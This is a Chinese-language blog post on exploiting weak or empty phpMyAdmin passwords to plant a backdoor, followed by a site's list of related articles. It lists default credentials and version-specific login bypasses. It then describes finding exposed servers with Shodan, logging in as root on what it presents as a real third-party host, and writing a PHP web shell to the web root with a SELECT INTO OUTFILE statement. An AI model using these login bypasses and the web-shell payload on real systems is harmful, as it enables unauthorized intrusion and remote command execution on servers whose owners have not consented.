phpMyAdmin通过密码漏洞留后门文件


Posted in PHP onNovember 20, 2018
  • 默认 phpMyAdmin:用户名 root 密码 root 或空登陆。
  • 版本 2.11.3~2.11.4:用户名 'localhost'@'@" 登陆,无需密码。
  • 版本 2.11.9.2:用户名 root 登陆,无需密码。

经测试,第二个漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理从略。

下面让我们简单的上网看看能不能找到一些存在这样漏洞的登陆页面。

祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。

phpMyAdmin

phpMyAdmin通过密码漏洞留后门文件

先看看有没有不需要密码登陆的,逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的(浙江省·杭州市)。

phpMyAdmin通过密码漏洞留后门文件

地址已手动打码。

http://121.***.*.219:80/

phpMyAdmin通过密码漏洞留后门文件

登陆成功(root 权限)。

phpMyAdmin通过密码漏洞留后门文件

接下来你可以写一个 outfile 到对方主机的网络目录下。俗称 “留后门”。

SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后门文件的绝对路径"

点击运行,不出意外便在对方主机留下了一个名为 runme.php 的后门文件。

总结

以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对三水点靠木的支持。如果你想了解更多相关内容请查看下面相关链接

PHP 相关文章推荐
PHP输出控制功能在简繁体转换中的应用
Oct 09 PHP
可定制的PHP缩略图生成程式(需要GD库支持)
Mar 06 PHP
Ajax+PHP边学边练 之五 图片处理
Dec 03 PHP
php数组函数序列之array_unique() - 去除数组中重复的元素值
Oct 29 PHP
php数组编码转换示例详解
Mar 11 PHP
php表单提交与$_POST实例分析
Jan 26 PHP
程序员的表白神器“520”大声喊出来
May 20 PHP
tp5(thinkPHP5)操作mongoDB数据库的方法
Jan 20 PHP
windows环境下使用Composer安装ThinkPHP5
May 18 PHP
php+mysql开发的最简单在线题库(在线做题系统)完整案例
Mar 30 PHP
PHP的图像处理实例小结【文字水印、图片水印、压缩图像等】
Dec 20 PHP
phpQuery解析HTML乱码问题(补充官网未列出的乱码解决方案)
Apr 01 PHP
ThinkPHP5 的简单搭建和使用详解
Nov 15 #PHP
关于php unset对json_encode的影响详解
Nov 14 #PHP
PHP集成环境XAMPP的安装与配置
Nov 13 #PHP
python进程与线程小结实例分析
Nov 11 #PHP
PHP 获取客户端 IP 地址的方法实例代码
Nov 11 #PHP
如何优雅的使用 laravel 的 validator验证方法
Nov 11 #PHP
php使用curl模拟浏览器表单上传文件或者图片的方法
Nov 10 #PHP
You might like
如何正确理解PHP的错误信息
2006/10/09 PHP
PHP利用str_replace防注入的方法
2013/11/10 PHP
php实现保存submit内容之后禁止刷新
2014/03/19 PHP
PHP rsa加密解密使用方法
2015/04/27 PHP
Nigma vs Alliance BO5 第三场2.14
2021/03/10 DOTA
原来Jquery.load的方法可以一直load下去
2011/03/28 Javascript
简单实现js选项卡切换效果
2016/02/03 Javascript
Node.js如何自动审核团队的代码
2016/07/20 Javascript
Angularjs的ng-repeat中去除重复数据的方法
2016/08/05 Javascript
JS日期对象简单操作(获取当前年份、星期、时间)
2016/10/26 Javascript
Vue实现双向绑定的原理以及响应式数据的方法
2018/07/02 Javascript
js取0-9随机取4个数不重复的数字代码实例
2019/03/27 Javascript
vue踩坑记-在项目中安装依赖模块npm install报错
2019/04/02 Javascript
vue-i18n实现中英文切换的方法
2020/07/06 Javascript
vue使用openlayers实现移动点动画
2020/09/24 Javascript
[01:27]DOTA2电竞之夜 今夜共饮庆功酒
2014/08/02 DOTA
python 查找文件夹下所有文件 实现代码
2009/07/01 Python
零基础写python爬虫之urllib2中的两个重要概念:Openers和Handlers
2014/11/05 Python
学习python类方法与对象方法
2016/03/15 Python
python将文本中的空格替换为换行的方法
2018/03/19 Python
python提取具有某种特定字符串的行数据方法
2018/12/11 Python
python如何实现视频转代码视频
2019/06/17 Python
Flask框架搭建虚拟环境的步骤分析
2019/12/21 Python
python编写一个会算账的脚本的示例代码
2020/06/02 Python
Restful_framework视图组件代码实例解析
2020/11/17 Python
TIME时代杂志台湾总代理:台时亚洲
2018/10/22 全球购物
加拿大留学自荐信
2014/01/28 职场文书
公务员四风问题对照检查材料整改措施
2014/09/26 职场文书
承租经营合作者协议书
2014/10/01 职场文书
自主招生自荐信格式
2015/03/04 职场文书
2015年社区环境卫生工作总结
2015/04/21 职场文书
食品安全责任书范本
2015/05/09 职场文书
交通事故被告答辩状
2015/05/22 职场文书
欢送领导祝酒词
2015/08/12 职场文书
机关单位2016年创先争优活动总结
2016/04/05 职场文书
干货:我将这样书写我的演讲稿!
2019/05/09 职场文书